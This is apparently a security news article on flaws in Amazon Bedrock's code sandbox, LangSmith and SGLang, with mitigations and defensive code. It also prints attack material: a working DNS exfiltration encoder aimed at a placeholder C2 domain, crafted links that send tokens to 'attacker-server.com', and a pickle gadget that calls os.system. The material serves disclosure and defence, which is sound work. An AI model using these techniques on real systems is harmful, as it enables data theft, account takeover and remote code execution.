Security researchers have identified critical vulnerabilities in popular AI platforms including Amazon Bedrock, LangSmith, and SGLang that could enable attackers to exfiltrate sensitive data and execute arbitrary code. These findings highlight emerging security challenges in rapidly expanding AI ecosystems.
The rapid adoption of artificial intelligence platforms has introduced new attack vectors that organizations must address to protect sensitive data and maintain system integrity. Recent research has uncovered critical vulnerabilities in several leading AI platforms that, if exploited, could enable attackers to bypass security controls, exfiltrate confidential information, and execute arbitrary code within production environments.

Amazon Bedrock DNS Bypass Vulnerability
BeyondTrust researchers have disclosed a significant security flaw in Amazon Bedrock's AgentCore Code Interpreter that undermines the platform's network isolation guarantees. Despite being designed to execute code in isolated sandbox environments, the service permits outbound DNS queries that can be abused by attackers to establish command-and-control channels and exfiltrate data.
"This research demonstrates how DNS resolution can undermine the network isolation guarantees of sandboxed code interpreters," explained Kinnaird McQuade, chief security architect at BeyondTrust. "By using this method, attackers could have exfiltrated sensitive data from AWS resources accessible via the Code Interpreter's IAM role, potentially causing downtime, data breaches of sensitive customer information, or deleted infrastructure."
The vulnerability, which carries a CVSS score of 7.5 out of 10.0, allows attackers to:
- Establish bidirectional communication channels using DNS queries and responses
- Obtain interactive reverse shells
- Exfiltrate sensitive information through DNS queries (if the IAM role has appropriate permissions)
- Deliver additional payloads via DNS queries that the Code Interpreter executes
- Poll DNS command-and-control servers for commands stored in DNS A records
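To make the exfiltration channel concrete, the sketch below (not taken from the BeyondTrust research; the domain `c2.example.com` is a placeholder) shows how arbitrary bytes can be encoded into DNS-safe hostname labels, each within the 63-character per-label limit, so that data leaves a "no network access" sandbox as ordinary lookups against an attacker-controlled resolver:

```python
import binascii

MAX_LABEL = 63  # per-label length limit from RFC 1035

def encode_for_dns(data: bytes, c2_domain: str) -> list[str]:
    """Split secret bytes into hex chunks that fit into DNS labels.

    Illustrative only: demonstrates why outbound DNS resolution alone
    is a sufficient channel to move data out of a sandbox.
    """
    hex_payload = binascii.hexlify(data).decode("ascii")
    chunks = [hex_payload[i:i + MAX_LABEL]
              for i in range(0, len(hex_payload), MAX_LABEL)]
    # A sequence-number label lets the receiving side reassemble in order.
    return [f"{seq}.{chunk}.{c2_domain}" for seq, chunk in enumerate(chunks)]

def decode_from_dns(queries: list[str], c2_domain: str) -> bytes:
    """Reassemble the payload on the resolver side from observed queries."""
    suffix = "." + c2_domain
    pieces = []
    for name in queries:
        seq, chunk = name[: -len(suffix)].split(".")
        pieces.append((int(seq), chunk))
    hex_payload = "".join(chunk for _, chunk in sorted(pieces))
    return binascii.unhexlify(hex_payload)
```

A defender's takeaway is the mirror image: a Route 53 Resolver DNS Firewall or equivalent can flag exactly this pattern of long, high-entropy subdomain labels.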
Amazon Bedrock AgentCore Code Interpreter, launched in August 2025, is designed to let AI agents execute code securely in isolated environments. However, the fact that it permits outbound DNS queries even under a "no network access" configuration creates a significant security risk.
Following responsible disclosure in September 2025, Amazon determined the issue to be intended functionality rather than a defect, urging customers to use VPC mode instead of sandbox mode for complete network isolation. The company also recommends using a DNS firewall to filter outbound DNS traffic.
"To protect sensitive workloads, administrators should inventory all active AgentCore Code Interpreter instances and immediately migrate those handling critical data from Sandbox mode to VPC mode," advised Jason Soroko, senior fellow at Sectigo. "Operating within a VPC provides the necessary infrastructure for robust network isolation, allowing teams to implement strict security groups, network ACLs, and Route53 Resolver DNS Firewalls to monitor and block unauthorized DNS resolution. Finally, security teams must rigorously audit the IAM roles attached to these interpreters, strictly enforcing the principle of least privilege to restrict the blast radius of any potential compromise."
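The IAM audit Soroko recommends can be partially automated. The helper below is an illustrative sketch: the policy document shape follows AWS's JSON policy schema, but the function itself is hypothetical, and a real audit would fetch documents via the IAM APIs and expand attached managed policies as well.

```python
def find_wildcard_statements(policy_doc: dict) -> list[dict]:
    """Return Allow statements that grant Action '*' or Resource '*'.

    A simple least-privilege check: wildcard grants on a Code
    Interpreter role widen the blast radius of any sandbox escape.
    """
    findings = []
    for stmt in policy_doc.get("Statement", []):
        if stmt.get("Effect") != "Allow":
            continue
        actions = stmt.get("Action", [])
        resources = stmt.get("Resource", [])
        # AWS allows either a single string or a list in both fields.
        if isinstance(actions, str):
            actions = [actions]
        if isinstance(resources, str):
            resources = [resources]
        if "*" in actions or "*" in resources:
            findings.append(stmt)
    return findings
```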
LangSmith Account Takeover Vulnerability
Separately, Miggo Security researchers have disclosed a high-severity security flaw in LangSmith (CVE-2026-25750, CVSS score: 8.5) that exposes users to potential token theft and account takeover. The vulnerability affects both self-hosted and cloud deployments of the AI observability platform.
The issue stems from URL parameter injection resulting from insufficient validation of the baseUrl parameter. Attackers can exploit this to steal a signed-in user's bearer token, user ID, and workspace ID by tricking victims into clicking specially crafted links:
- Cloud: smith.langchain[.]com/studio/?baseUrl=https://attacker-server.com
- Self-hosted: /studio/?baseUrl=https://attacker-server.com
"A logged-in LangSmith user could be compromised merely by accessing an attacker-controlled site or by clicking a malicious link," stated Miggo researchers Liad Eliyahu and Eliana Vuijsje. "This vulnerability is a reminder that AI observability platforms are now critical infrastructure. As these tools prioritize developer flexibility, they often inadvertently bypass security guardrails. This risk is compounded because, like 'traditional' software, AI Agents have deep access to internal data sources and third-party services."
Successful exploitation could allow attackers to gain unauthorized access to the AI's trace history, as well as expose internal SQL queries, CRM customer records, or proprietary source code by reviewing tool calls.
The vulnerability has been addressed in LangSmith version 0.12.71 released in December 2025. Organizations using LangSmith should ensure they have updated to this patched version and implement additional security measures such as:
- Implementing strict URL validation in web applications
- Using content security policies (CSP) to prevent unauthorized connections
- Conducting regular security awareness training for developers
- Implementing multi-factor authentication to limit the impact of compromised credentials
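The strict URL validation in the first bullet amounts to an allowlist check on any baseUrl-style parameter. The sketch below is a generic illustration, not LangSmith's actual fix; the allowed hostname set is an assumption for the example:

```python
from urllib.parse import urlparse

ALLOWED_BASE_HOSTS = {"smith.langchain.com"}  # hypothetical allowlist

def is_safe_base_url(value: str) -> bool:
    """Accept a baseUrl parameter only for known HTTPS hosts.

    Rejecting everything else closes the pattern described above,
    e.g. ?baseUrl=https://attacker-server.com, as well as
    scheme-relative and javascript: variants.
    """
    parsed = urlparse(value)
    return parsed.scheme == "https" and parsed.hostname in ALLOWED_BASE_HOSTS
```

Parsing with `urlparse` rather than string matching matters here: prefix checks like `value.startswith("https://smith.langchain.com")` are bypassable with hosts such as `smith.langchain.com.evil.com`.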
SGLang Unsafe Pickle Deserialization Vulnerabilities
Orca Security researcher Igor Stepansky has identified multiple critical vulnerabilities in SGLang, an open-source framework for serving large language models and multimodal AI models. These flaws involve unsafe pickle deserialization that could lead to remote code execution.
Three distinct vulnerabilities have been identified:
CVE-2026-3059 (CVSS score: 9.8): An unauthenticated remote code execution vulnerability through the ZeroMQ (ZMQ) broker, which deserializes untrusted data using pickle.loads() without authentication. This affects SGLang's multimodal generation module.
CVE-2026-3060 (CVSS score: 9.8): An unauthenticated remote code execution vulnerability through the disaggregation module, which deserializes untrusted data using pickle.loads() without authentication. This affects SGLang's encoder parallel disaggregation system.
CVE-2026-3989 (CVSS score: 7.8): Use of the insecure pickle.load() function without validation or safeguards in SGLang's "replay_request_dump.py" crash dump replay utility, which can be exploited by supplying a malicious pickle file.
"The first two allow unauthenticated remote code execution against any SGLang deployment that exposes its multimodal generation or disaggregation features to the network," Stepansky explained. "The third involves insecure deserialization in a crash dump replay utility."
In a coordinated advisory, the CERT Coordination Center (CERT/CC) confirmed that SGLang is vulnerable to CVE-2026-3059 when the multimodal generation system is enabled, and to CVE-2026-3060 when the encoder parallel disaggregation system is enabled.
"If either condition is met and an attacker knows the TCP port on which the ZMQ broker is listening and can send requests to the server, they can exploit the vulnerability by sending a malicious pickle file to the broker, which will then deserialize it," CERT/CC stated.
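The root issue is that pickle.loads() will invoke attacker-chosen callables during deserialization. Where pickle cannot be replaced outright (switching to JSON is the cleaner fix), a restricted unpickler that refuses to resolve any global blocks the usual os.system-style gadgets. The sketch below is a generic illustration of the technique, not SGLang's actual patch:

```python
import io
import pickle

class RestrictedUnpickler(pickle.Unpickler):
    """Refuse to resolve globals, blocking __reduce__-based RCE gadgets."""

    def find_class(self, module, name):
        raise pickle.UnpicklingError(
            f"global '{module}.{name}' is forbidden in untrusted input")

def safe_loads(data: bytes):
    """Deserialize plain containers/scalars only; reject anything that
    needs to import a callable (the vector behind CVE-2026-3059/3060)."""
    return RestrictedUnpickler(io.BytesIO(data)).load()

class Evil:
    """Classic pickle gadget: deserializing this would call os.system."""
    def __reduce__(self):
        import os
        return (os.system, ("echo pwned",))
```

With this in place, `safe_loads(pickle.dumps({"msg": "hello"}))` succeeds because plain dicts and strings reference no globals, while the `Evil` payload is rejected before os.system is ever resolved.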

Mitigation Strategies for AI Platform Vulnerabilities
These vulnerabilities highlight the need for enhanced security practices in AI deployments. Organizations should consider the following mitigation strategies:
For Amazon Bedrock Users:
- Immediately migrate critical workloads from Sandbox mode to VPC mode
- Implement DNS firewalls to filter and monitor outbound DNS traffic
- Regularly audit IAM roles attached to Code Interpreter instances
- Follow the principle of least privilege when configuring permissions
For LangSmith Users:
- Update to version 0.12.71 or later to address the CVE-2026-25750 vulnerability
- Implement additional URL validation mechanisms
- Deploy content security policies to prevent unauthorized connections
- Conduct security awareness training for developers using the platform
For SGLang Users:
- Restrict access to service interfaces and ensure they are not exposed to untrusted networks
- Implement network segmentation and access controls for ZeroMQ endpoints
- Consider disabling multimodal generation and encoder disaggregation features if not required
- Monitor for suspicious activities such as unexpected connections, processes, or file creations
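The restriction in the first two bullets can be enforced with a pre-flight check before a broker socket is bound. The function below is an illustrative sketch (the endpoint string follows ZeroMQ's tcp:// convention); binding to 0.0.0.0 is precisely what exposes the pickle deserialization path to untrusted networks:

```python
import ipaddress
from urllib.parse import urlsplit

def is_loopback_endpoint(endpoint: str) -> bool:
    """True only if a tcp:// endpoint binds to a loopback address."""
    parts = urlsplit(endpoint)
    host = parts.hostname
    if parts.scheme != "tcp" or host is None:
        return False
    try:
        return ipaddress.ip_address(host).is_loopback
    except ValueError:  # not a literal IP, e.g. a hostname
        return host == "localhost"
```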
General AI Security Best Practices:
- Regularly update and patch AI platforms and their dependencies
- Implement network segmentation to limit the blast radius of potential compromises
- Conduct regular security assessments of AI deployments
- Monitor for anomalous behavior in AI systems
- Implement logging and alerting for security-relevant events
- Follow the principle of least privilege for all AI service accounts
- Regularly audit permissions and access controls
The Growing Security Challenge in AI
These vulnerabilities underscore the evolving security landscape in artificial intelligence. As AI systems become more integrated into critical business processes, the potential impact of security incidents grows significantly.
"AI platforms are becoming critical infrastructure, and their security cannot be an afterthought," said security researcher Eliana Vuijsje.
Organizations must adopt a security-first approach when implementing AI technologies, incorporating security considerations throughout the development lifecycle rather than treating them as an afterthought. This includes secure coding practices, thorough testing, and robust monitoring of AI systems in production environments.
The rapid evolution of AI technologies presents both opportunities and challenges for security professionals. By staying informed about emerging vulnerabilities and implementing appropriate security controls, organizations can harness the power of AI while minimizing associated risks.
For more information on these vulnerabilities:
- Amazon Bedrock: AWS Security Blog
- LangSmith: Miggo Security Advisory
- SGLang: CERT/CC Advisory

The three vulnerabilities covered here affect major AI platforms, and as AI continues to transform business operations, security must remain a top priority. Organizations should review their AI deployments for these flaws, apply the available patches and configuration changes, and sustain investment in AI security practices that keep pace with an evolving threat landscape.
